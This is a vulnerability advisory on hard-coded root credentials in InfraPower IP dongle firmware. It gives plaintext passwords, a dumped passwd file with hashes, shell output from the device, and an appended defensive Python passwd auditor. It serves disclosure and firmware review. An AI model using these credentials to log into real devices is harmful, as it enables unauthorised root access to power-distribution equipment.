
InfraPower PPS-02-S Q213V1 Hard-Coded Credentials Remote Root

30 Oct 2016 00:00:00 | Reported by LiquidWorm | Type: packetstorm | Source: packetstormsecurity.com

InfraPower PPS-02-S Q213V1 Hard-Coded Credentials Remote Root Access on IP Dongle Firmwar

Code
`  
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access  
  
  
Vendor: Austin Hughes Electronics Ltd.  
Product web page: http://www.austin-hughes.com  
Affected version: Q213V1 (Firmware: V2395S)  
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)  
  
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each  
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.  
Patented IP Dongle provides IP remote access to the PDUs by a true  
network IP address chain. Only 1xIP dongle allows access to max. 16  
PDUs in daisy chain - which is a highly efficient application  
for saving not only the IP remote accessories cost, but also the true  
IP addresses required on the PDU management.  
  
Desc: InfraPower suffers from a use of hard-coded credentials. The IP  
dongle firmware ships with hard-coded accounts that can be used to gain  
full system access (root) using the telnet daemon on port 23.  
  
Tested on: Linux 2.6.28 (armv5tel)  
lighttpd/1.4.30-devel-1321  
PHP/5.3.9  
SQLite/3.7.10  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5371  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php  
  
  
27.09.2016  
  
--  
  
  
# cat /etc/passwd  
  
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh  
bin:x:1:1:bin:/bin:/bin/sh  
daemon:x:2:2:daemon:/usr/sbin:/bin/sh  
adm:x:3:4:adm:/adm:/bin/sh  
lp:x:4:7:lp:/var/spool/lpd:/bin/sh  
sync:x:5:0:sync:/bin:/bin/sync  
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh  
operator:x:11:0:Operator:/var:/bin/sh  
nobody:x:99:99:nobody:/home:/bin/sh  
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script  
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script  
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh  
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh  
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh  
  
# showing accounts in root group:  
  
Username: root  
Password: 8475  
--  
Username: service  
Password: ipdongle  
--  
Username: www  
Password: 9311  
--  
Username: www2  
Password: 9311  
  
# showing other less-privileged accounts:   
  
Username: user  
Password: 8475  
--  
Username: admin  
Password: 8475  
  
--------  
  
/mnt/mtd # echo $SHELL  
/sbin/root_shell.sh  
/mnt/mtd # cat /sbin/root_shell.sh   
#!/bin/sh  
trap "" 2 3 9 24  
  
# check login  
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`  
  
if [ "$passWork" = "1" ]; then  
    login_file=/mnt/mtd/root_login  
    now_timestamp=`date +%s`  
  
    if [ -f $login_file ]; then  
        line=`wc -l $login_file | cut -c 1-9`  
        if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then  
            pre_login=`tail -n 3 $login_file | cut -d " " -f 1`  
            pre_result1=`echo $pre_login | cut -d " " -f 1`  
            pre_result2=`echo $pre_login | cut -d " " -f 2`  
            pre_result3=`echo $pre_login | cut -d " " -f 3`  
            if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then  
                pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`  
                result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`  
                if [ "$result" != "success" ]; then  
                    echo $result  
                    exit 0  
                fi  
            fi  
        fi  
    fi  
  
    echo -n "password:"  
    read pass  
    if [ "$pass" != "999" ]; then  
        echo "wrong password"  
        echo fail $now_timestamp >> $login_file  
        exit 0  
    fi  
    echo success $now_timestamp >> $login_file  
fi  
  
/bin/sh  
/mnt/mtd #   
  
--------  
  
/mnt/mtd # ls  
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf  
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf  
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log  
  
--------  
  
/mnt/mtd # df -h  
  
Filesystem Size Used Available Use% Mounted on  
tmpfs 256.0M 4.0K 256.0M 0% /tmp  
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd  
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1  
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2  
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3  
  
--------  
  
/www # ls -al  
  
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .  
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..  
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php  
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php  
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php  
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php  
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php  
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php  
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General  
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php  
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php  
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images  
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript  
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php  
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php  
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php  
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php  
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php  
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php  
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php  
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php  
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php  
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php  
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php  
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php  
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php  
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php  
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php  
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php  
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php  
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php  
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php  
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php  
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php  
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php  
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php  
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php  
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php  
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php  
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php  
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php  
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php  
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh  
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php  
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php  
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php  
  
`
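
An added example (not part of the advisory and not vendor code): a firmware-review check that parses an extracted /etc/passwd and flags what the dump above exhibits, namely extra UID 0 accounts, password hashes kept in the world-readable passwd file, weak crypt schemes, and one hash shared by several accounts. The function names and finding labels are assumptions; the sample input is a subset of the lines quoted in the advisory.

```python
import collections

# Constructed sample: a subset of the /etc/passwd lines quoted in the advisory.
PASSWD = """\
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
"""

def hash_scheme(field):
    """Classify the password field of a passwd(5) entry (hypothetical helper)."""
    if field.startswith(("x", "!", "*")) and len(field) <= 2:
        return None            # shadowed ("x") or locked ("!", "*", "!!")
    if field == "":
        return "empty"         # no password at all
    if field.startswith("$1$"):
        return "md5crypt"      # salted MD5, obsolete
    if field.startswith("$"):
        return "modular"       # other $id$ scheme, still exposed in passwd
    if len(field) == 13:
        return "descrypt"      # traditional DES crypt, 8-char limit
    return "unknown"

def audit_passwd(text):
    """Return (account, finding) tuples for one passwd file."""
    findings = []
    by_hash = collections.defaultdict(list)
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue           # skip malformed or blank lines
        name, pw, uid = parts[0], parts[1], parts[2]
        if uid == "0" and name != "root":
            findings.append((name, "uid0-alias"))
        scheme = hash_scheme(pw)
        if scheme is None:
            continue
        findings.append((name, "hash-in-passwd:" + scheme))
        by_hash[pw].append(name)
    for names in by_hash.values():
        if len(names) > 1:     # identical salt+hash means identical password
            findings.append((",".join(names), "shared-hash"))
    return findings
```

Running `audit_passwd` against each firmware image before and after an update shows whether the vendor fix actually removed the baked-in accounts.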
